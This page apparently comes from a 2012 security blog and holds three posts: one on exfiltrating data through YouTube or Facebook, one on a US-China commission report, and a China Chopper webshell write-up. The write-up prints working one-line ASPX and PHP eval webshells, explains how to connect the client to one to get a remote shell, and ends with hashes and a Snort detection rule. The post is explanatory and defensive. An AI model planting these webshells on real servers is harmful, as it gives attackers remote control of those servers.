Saturday, November 24, 2012

Concealing Data Exfiltration with Youtube or Facebook

You've probably already read about Backdoor.Makadocs which uses Google Docs or Google Drive as a command-and-control (C&C) server. This made quite a big stir last week, unfortunately this isn't a new trick. ACAD/Medre.A was created for the mass exfiltration of AutoCad files and used for transmitting files. I'm sure there are many other examples too.

The use of legitimate sites like Google Docs, Facebook and Youtube seem to be the obvious choice for hackers wanting to exfiltrate data. The benefit of course is the lack of IoC's from a network perspective. Could you tell the difference between someone watching a 30-minute clip or exfiltrating *.{doc,xls,dwg} files to Youtube or Facebook over SSL? There are already tools available to hide TrueCrypt volumes in mp4's. Why not use Youtube or Facebook to exfiltrate data? I haven't read any incidents involving this but it's coming.

As companies improve there security to detected unwanted software the move to legitimate remote administration programs such as GoToMyPC, the natural path of evil doers would be to use those as well. Speaking of which, did you know you can control who uses GoToMyPC from your corporate IP space?

"Can I block the unofficial use of GoToMyPC Pro while allowing authorized use?
Yes. Through our free Authorization Management Service (AMS), GoToMyPC Pro will gladly work with you to block selected Internet-visible IPs while still enabling authorized GoToMyPC Pro account access. If you do not currently have a GoToMyPC Pro account but wish to block access by using AMS, please If you are a current GoToMyPC Pro customer, please contact us"
If your company has a policy against using GoToMyPC (and no way to enforce it) you should probably work with Citrix to restrict access. If your company allows it, you should really restrict authorized accounts.


Sunday, November 18, 2012

Fear and Loathing in China - U.S.-China Economic and Security Review Commission

If you haven't heard the 2012 REPORT TO CONGRESS of the U.S.-CHINA ECONOMIC AND 
SECURITY REVIEW COMMISSION is out. I've read through some of it and thought it would benefit the InfoSec community to highlight some of the key points (at least to me) of what I've read. 

The first thing that struck me was the branding of the attacks as "advanced persistent threats". It had all the signs of a marketing campaign from * security vendors. At one point this sentiment is stated:

"Anecdotally, Chinese hackers’ sophistication may fall short of their counterparts in Russia or elsewhere, but some indicators suggest improving skills. Obscuring the matter is a notable capability gap between various Chinese actors and a common practice of expending the minimum amount of effort necessary to compromise a target. This includes the utilization of widely available tools and known exploits, which require less skill than original or customized exploitation methods."
I interpret this as them adjusting their tactics as we adjust ours, cat and mouse game. They don't need another king when the pawns are doing just fine. Like any good chess player they are already planning their future moves.

"The PLA does not have a deep reservoir of personnel able to manage sophisticated information systems. Chinese military leaders, however, recognize this weakness and intend to develop a pool of soldiers who can conduct or plan joint military operations, manage information systems and cyber technology, and use or maintain advanced weapon systems.The PLA’s goal is to achieve this expanded pool of personnel by 2020."
After reading more of this I start to see their desire for more talent not as a weakness but as a sign of their success. We've all read countless stories proving this. Take NASA for example, I've been reading about them getting hacked for the last decade (ok actually more than that, remember The Cuckoo's Egg).

"For example, the National Aeronautics and Space Administration (NASA) in February disclosed a series of penetrations against its networks. According to testimony to the House Committee on Science, Space, and Technology, Subcommittee on Investigations and Oversight, from Paul K. Martin, NASA inspector general: In FY [fiscal year] 2011, NASA reported it was the victim of 47 APT [Advanced Persistent Threat] *  attacks, 13 of which successfully compromised Agency computers. In one of the successful attacks, intruders stole user credentials for more than 150 NASA employees—credentials that could have been used to gain unauthorized access to NASA systems. Our ongoing investigation of another such attack at JPL [Jet Propulsion Laboratory] involving Chinese-based Internet protocol (IP) addresses has confirmed that the intruders gained full . . . functional control over these [JPL] networks."

I can't help but think that our approach to tackling this problem is done with poor strategy.  I say this because the approach taken to fight this is analogous to that of the local fire department 20-years ago. Even today many of us still rely on the smoke detectors known in IT as antivirus or customers calling the helpdesk (911) reporting viruses.  A big difference is that our "smoke detectors" can only alert on a fraction of fires.

I certainly don't have the cure all answers for this problem but I do know that equal focus needs to be placed in preventing the execution of malicious software as we typically place in detecting them. More attention to application privileges and managing them needs to be addressed. This problem is not going away and is only getting worse. On the bright side, tomorrow is monday ;)

Friday, November 16, 2012

China Chopper Webshell - the 4KB that Owns your Web Server

I've been wanting to blog about China Chopper for sometime and finally got around to it. When I first started researching this webshell I was unable to find anything about how to set it up and configure it. In this post I'll go over the components of China Chopper as well as setting it up.

China Chopper is a webshell used to remotely access Windows or Linux servers. It is malicious software used by the bad guys. Given the name China Chopper it is developed in China and used heavily by Chinese hackers.

The software is hosted on, which I might mention has recently changed. 

The webshell consists mainly of two parts, the client interface (caidao.exe) and the file placed on the compromised web server. 

Here are the files included with the download & MD5's.

caidao.exe                                     5001ef50c7e869253a7c152a638eab8a


 aspRwWithJMail.ccc                         a6d6cbfa2ead1d0e8a6735aa49b963ff
 aspSpy.ccc                                    be207c46105c38571ae958ae2da47297
 aspx.ccc                                        cc07ac4caef188334fc330f62e0a574a
 php.ccc                                         9100b18660f3a1eeca7ea801b357b8ce
 phpSpy.ccc                                    ce1a9fc93040d5c94f789b579fe1c106

 Customize.aspx                                8aa603ee2454da64f4c70f24cc0b5e08
 Customize.cfm                                 ad8288227240477a95fb023551773c84
 Customize.jsp                                  acba8115d027529763ea5c7ed6621499  

The file dropped on the compromised server is nice and small. The client, caidao.exe communicates directly with the file.

Servers running IIS, place the contents below in a file called webshell.aspx
<%@ Page Language="Jscript"%><%eval(Request.Item[”password"],"unsafe");%>

Servers running Apache with PHP, place the contents in a file call webshell.php
<?php @eval($_POST['password']);?>

Next, open caidao.exe

You will see examples already listed referencing Lets add in the information to communicate with our test compromised Windows 2008 R2 server using the webshell.aspx file mentioned above.

Right-click and select add, you will see the following dialog box
Address field is the URL to the file on the compromised server. The next field acts as a password of sort, if this doesn't match the contents in the webshell.aspx file it won't work.
<%@ Page Language="Jscript"%><%eval(Request.Item[”password"],"unsafe");%>

Change the file type to match ASPX and change the codepage to UTF-8. 

Click 'Edit' to save your changes. To open up a remote shell, right-click on the entry and select 'Virtual Terminal'.  If everything was correctly you will see the following command interface.

I should note that this works on a fully patched and default configuration of Windows 2008 R2 web server role. Primarily because .NET by default has full control, if you change it to 'High' China Chopper (and many other) webshell will not work.
When the webshell is executing commands you will see the following with Process Explorer

IIS logs will show only a post to the file, here is a line copied from the IIS log
2012-11-16 22:30:14 POST /webshell.aspx - 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0 31

The traffic is base64 encoded, here is a snipit from Wireshark during a post of the initial connection and sending the netstat command.

There are many ways to protect against this so I won't go into that, however it would be a good idea to do some Splunking on http posts! If you don't have Splunk you could use snort to  monitor for this with a simple rule to watch for base64_decode and POST.

I put this together really quick as a proof of concept so no consideration was put into performance. Snort might already have much better rules in place to detect base64 in http traffic.
alert tcp any any -> any 80 ( sid:900001;  content:"base64_decode"; http_client_body;flow:to_server,established; content:"POST"; nocase;http_method; ;msg:"Webshell Detected Apache";)

I hope this post has informative and helped you out. If you have any questions, please feel free to contact me.